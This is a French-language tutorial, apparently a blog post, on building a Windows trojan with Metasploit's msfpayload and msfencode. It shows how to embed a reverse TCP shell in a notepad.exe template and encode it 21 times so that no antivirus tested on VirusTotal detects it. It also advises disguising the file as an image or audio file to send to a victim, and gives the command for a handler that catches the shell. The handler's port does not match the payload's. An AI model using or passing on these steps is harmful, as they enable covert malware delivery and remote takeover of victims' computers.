msfencode  pour détourner la détection anti-virus

>Plateforme utilisé backtrack 4.

I-Utilisation de msfencode  pour rendre un trojan indétectable par un outil anti-virus, pour ceux qui ne savent pas ce qui est un trojan, un trojant est un  programme de petite taille que le hacker introduit dans le système de sa victime, ce programme va agir pour nous en effectuant quelque manipulation sur le system hôte, ou tout simplement nous fournir quelque information sur ce système infecté.

Ce serveur a besoin d’un client, pour ce tutorial je suggère de travailler avec le client de l’outil  metaspload, mais vous pouvez utiliser aussi d’autre outils comme bifrost .

Un petit souci les outils anti-virus risque de détecter tout de suite notre payload ou trojan, mais comment ils font ça !!, tout simplement, lors de leur analyse du système, il vont chercher dans chaque fichier, une séquence de bits qui est suspecte, cette séquence de bits est connu comme caractéristique d’un trojan ,c’ est ce qu’on appelle signature, oups tous nos trojans risque d’être reconnu…. comment peut résoudre ce problème……………..,ne vous inquiétez pas une solution existe, cette solution consiste à changer la signature de notre trojan, msfencode fait ça pour nous, en introduisant des séquence de code, de tel sort que les fonctionnalité du trojan ne change pas.

>Commençant par introduire quelque fonctionnalité de msfencode, pour voir les différentes fonctionnalités, il suffit de taper  sur la ligne de commande de back track  4.

 msfencode –h

OPTIONS:
Description : C:\Users\sofiane\AppData\Local\Temp\11.jpg 

>En utilisant l'option-c, msfencode vous permet de répéter le processus d'encodage récursivement plusieurs fois, c’est la fonctionnalité la plus intéressante puisque c’est en  l’exécutant qu’on va réussir a détourner les anti-virus, ce nombre sera déterminé expérimentalement en le soumettant à une analyse antivirus.

On va essayer d’exécuter ce processus avec un nombre d’itération différent, et  faire un teste chaque  fois , avec un outils sur le net qui permet de tester la détection avec plus de 40 anti-virus et de voir chaque fois le nombre d’antivirus qui ont réussi à détecter le Trajan.  www.virustotal.com?

1 encoding = 3/42 AV tools
2 encodings = 8/42 AV tools
5 encodings = 6/42 AV tools
10 encodings = 8/42 AV tools
15 encodings = 8/42 AV tools
18 encodings = 7/42 AV tools
20 encodings = 1/42 AV tools = AVG

21 encodings=0/42 AV tools

 

 

> Avant d’envoyer le Trojan, je vous conseille de lui changer l’icône et d’utiliser une autre extension différente que EXE, ou essayer de le spoofer dans une image ou dans un fichier audio, msn ou autre serveur mail ne permet pas de transmettre des exécutable alors je vous conseille de l’envoyer sous format zip, évidement cela dépend du système installé par la victime, cela n’est pas traité dans ce tutorial.

Avant d’encoder un trojan, il faut déjà le crier oups, je vous montre tout de suite comment le faire, c’est la commande :

./

msfpayload windows/adduser  pass=osman  user=salem   x>out.exe

>Avec cette commande on va crier un payload accessible par l’utilisateur osman ; l’option x signifie que le trojan sera intègreré dans le fichier out.exe, si on spécifie un fichier, exemple Notepad celui-ci va être utilisé comme modèle pour créer notre trojan et il aura les mêmes caractéristiques que Notepad.

./ msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=4444 R | msfencode  -c 21  -x notepad.exe -t exe -e x86/shikata_ga_nai -o reversenotepad.exe

Description : C:\Users\sofiane\AppData\Local\Temp\12.jpg

-ici le c c’est le nombre de fois que sera encode le trojan.

-LHOST est mon adresse IP ou le trojan va se connecte pour retourner les informations.

-LPORT est le port correspondant à metaspload, c’est le port par default utilisé par cet outil.

-T est pour dire que le format a utilisé est le format exécutable.

-shikata_ga_nai est le type d’encodage utilisé pour notre trojan.

-x pour dire d’utiliser ce modèle.

-o c’est le fichier ou sera intégré le trojan.

 

>après exécution de cette instruction, vous recevrez la confirmation de la création de votre trojan.

x86/shikata_ga_nai succeeded with size 318 (iteration=21)

>pour terminer, activer le client par cette commande

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337

>dès que la victime exécute le serveur, on est directement dans son lecteur  c:.